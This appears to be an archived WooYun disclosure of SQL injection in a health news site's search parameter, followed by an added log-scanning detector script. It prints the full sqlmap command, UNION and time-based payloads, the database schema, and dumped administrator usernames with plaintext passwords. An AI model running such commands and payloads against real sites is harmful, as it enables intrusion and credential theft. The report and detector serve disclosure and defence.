WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2015-11-26: Details sent to the vendor; awaiting vendor handling
2015-11-29: Vendor confirmed; details disclosed to the vendor only
2015-12-09: Details disclosed to core white hats and relevant domain experts
2015-12-10: Vendor fixed the vulnerability and proactively disclosed it; details disclosed to the public
健康醫療網 (Health Medical Net) is a comprehensive health media platform centred on health news and new treatment information, dedicated to providing the most professional, timely and lifestyle-oriented content. Its "Health Blog" invites professionals to write about health topics and share more complete healthcare knowledge and services, aiming to become the public's first choice for health information. The site has also set up a "Public Welfare Zone", hoping to use online communities to gather support for disadvantaged groups and to use its media voice to spread goodwill and fulfil its social responsibility.
Address: http://**.**.**.**/search.php?keyword=ZREq
$ python sqlmap.py -u "http://**.**.**.**/search.php?keyword=ZREq" -p keyword --technique=U --random-agent --batch -D healthne_event -T soho_administrators -C AdminID,Username,Password,Email,LastLoginIP --dump
---
Parameter: keyword (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keyword=nDtU') AND (SELECT * FROM (SELECT(SLEEP(5)))DoPn) AND ('mNjW'='mNjW

    Type: UNION query
    Title: Generic UNION query (NULL) - 34 columns
    Payload: keyword=nDtU') UNION ALL SELECT CONCAT(0x7170706271,0x78416657475158744a73766b5843756243467873576668457647534f47694f4569697855566d6f59,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web application technology: Apache 2.2.29, PHP 5.4.33
back-end DBMS: MySQL 5.0.12
current user: 'healthne_portal@localhost'
current user is DBA: False
database management system users [1]:
[*] 'healthne_portal'@'localhost'

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 1146    |
| SESSION_VARIABLES                     | 331     |
| GLOBAL_VARIABLES                      | 319     |
| GLOBAL_STATUS                         | 317     |
| SESSION_STATUS                        | 317     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 197     |
| COLLATIONS                            | 197     |
| STATISTICS                            | 124     |
| TABLES                                | 116     |
| PARTITIONS                            | 95      |
| KEY_COLUMN_USAGE                      | 48      |
| TABLE_CONSTRAINTS                     | 48      |
| CHARACTER_SETS                        | 39      |
| SCHEMA_PRIVILEGES                     | 36      |
| PLUGINS                               | 23      |
| VIEWS                                 | 21      |
| ENGINES                               | 9       |
| PROCESSLIST                           | 4       |
| SCHEMATA                              | 3       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

Database: healthne_event
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| soho_administrators                   | 2       |
| soho_member                           | 1       |
| soho_system                           | 1       |
| soho_vote                             | 1       |
+---------------------------------------+---------+

Database: healthne_vhost52412
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| web_count                             | 9233792 |
| bbs_repost_backup                     | 35328   |
| news_tag                              | 33432   |
| ae_hosnav                             | 26931   |
| news_data                             | 23917   |
| view_announceList                     | 23917   |
| login_log                             | 22138   |
| news_tag_parse                        | 21615   |
| eventVoteHistory                      | 21466   |
| ad_data                               | 6606    |
| news_data_backup                      | 5072    |
| member_data                           | 2966    |
| news_revert                           | 851     |
| news_class                            | 586     |
| bbs_data                              | 347     |
| view_bbs_data                         | 347     |
| qnaire_a                              | 341     |
| sessionsPortal                        | 305     |
| bbs_revert                            | 255     |
| view_bbs_revert                       | 255     |
| contactus_data                        | 230     |
| hospitalList                          | 145     |
| blog                                  | 105     |
| view_blog                             | 105     |
| user_data                             | 96      |
| view_user_data                        | 96      |
| faq_data                              | 94      |
| view_blog_qa                          | 94      |
| branch_role                           | 89      |
| view_branch_role                      | 89      |
| view_blog_back1                       | 83      |
| eventVoteObject                       | 82      |
| qnaire_q                              | 72      |
| partner_data                          | 70      |
| captcha                               | 59      |
| news_special                          | 42      |
| photo_data                            | 34      |
| sessionsEvent                         | 18      |
| bbs_class                             | 14      |
| unit_data                             | 13      |
| news_rss                              | 11      |
| rssClient                             | 11      |
| view_actionData                       | 11      |
| view_newslist1                        | 8       |
| view_newslist1_bk                     | 8       |
| view_newslist2                        | 8       |
| about_data                            | 7       |
| photo_class                           | 7       |
| cache_blog1_list                      | 6       |
| cache_blog2_list                      | 6       |
| cache_blog3_list                      | 6       |
| view_blog1                            | 6       |
| view_blog2                            | 6       |
| view_blog3                            | 6       |
| admin                                 | 4       |
| view_newslist4                        | 4       |
| view_newslist3                        | 3       |
| sessionsAdmin                         | 2       |
| branch_data                           | 1       |
| news_Hspecial                         | 1       |
| sys_settings                          | 1       |
| view_movie                            | 1       |
| view_raido                            | 1       |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: healthne_event
Table: soho_administrators
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| Password | varchar(33) |
+----------+-------------+

Database: healthne_event
Table: soho_administrators
[2 entries]
+----------+
| Password |
+----------+
| admin    |
| vascular |
+----------+

Database: healthne_event
Table: soho_administrators
[10 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| AdminID       | int(10) unsigned |
| Competence    | text             |
| Competence1   | text             |
| Email         | varchar(33)      |
| GroupID       | int(11)          |
| LastLoginIP   | varchar(5)       |
| LastLoginTime | datetime         |
| Password      | varchar(33)      |
| Remarks       | varchar(85)      |
| Username      | varchar(33)      |
+---------------+------------------+

Database: healthne_event
Table: soho_administrators
[2 entries]
+---------+----------+----------+-------------------+-------------+
| AdminID | Username | Password | Email             | LastLoginIP |
+---------+----------+----------+-------------------+-------------+
| 1       | vascular | vascular | admin@**.**.**.** | 127.0       |
| 2       | admin    | admin    | admin@**.**.**.** | 127.0       |
+---------+----------+----------+-------------------+-------------+

Database: healthne_vhost52412
Table: web_count
[5 columns]
+--------+------------------+
| Column | Type             |
+--------+------------------+
| hot    | int(2)           |
| id     | int(11) unsigned |
| pid    | varchar(50)      |
| t_time | date             |
| wtype  | varchar(10)      |
+--------+------------------+
Deploy a WAF.
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-11-29 18:08
Thanks for the report.
2015-12-10: Fixed
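As an added, defender-side example (not part of the original report or the vendor's code), the following Python script scans Apache access-log lines for the two request shapes sqlmap reported above in the keyword parameter: a UNION ... SELECT probe and a SLEEP()-based time delay. It decodes the query string (including double URL encoding) before matching, so an encoded payload is not missed, and it does not flag ordinary search terms that merely contain the word "union". The log lines, IP addresses and timestamps are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Patterns mirroring the two injection types in the report.
UNION_RE = re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)
SLEEP_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
# Quote-closing / comment tails typical of injection probes, e.g. ') AND ( or -- -
TAIL_RE = re.compile(r"--\s|/\*|'\)\s*(and|or)\b", re.I)

# Apache combined log: only the client IP and request URL are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log; IPs are from the documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Nov/2015:10:01:02 +0800] "GET /search.php?keyword=ZREq HTTP/1.1" 200 5120
203.0.113.5 - - [26/Nov/2015:10:01:09 +0800] "GET /search.php?keyword=nDtU%27%29+AND+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29DoPn%29+AND+%28%27mNjW%27%3D%27mNjW HTTP/1.1" 200 5120
203.0.113.5 - - [26/Nov/2015:10:01:15 +0800] "GET /search.php?keyword=nDtU%27%29+UNION+ALL+SELECT+NULL%2CNULL--+- HTTP/1.1" 200 7900
198.51.100.9 - - [26/Nov/2015:10:02:00 +0800] "GET /search.php?keyword=union+of+hospitals HTTP/1.1" 200 5120
"""


def classify(value):
    """Return 'union', 'time-based', 'probe' or None for one parameter value."""
    v = unquote_plus(unquote_plus(value))  # also undo double encoding
    if UNION_RE.search(v):
        return "union"
    if SLEEP_RE.search(v):
        return "time-based"
    if TAIL_RE.search(v):
        return "probe"
    return None


def scan(log_text, watched_params=("keyword",)):
    """Return (ip, param, class, decoded value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        qs = parse_qs(urlsplit(m.group("url")).query, keep_blank_values=True)
        for param, values in qs.items():
            if watched_params and param not in watched_params:
                continue
            for val in values:
                kind = classify(val)
                if kind:
                    hits.append((m.group("ip"), param, kind, val))
    return hits


if __name__ == "__main__":
    for ip, param, kind, val in scan(SAMPLE_LOG):
        print(f"{ip} {param} [{kind}] {val}")
```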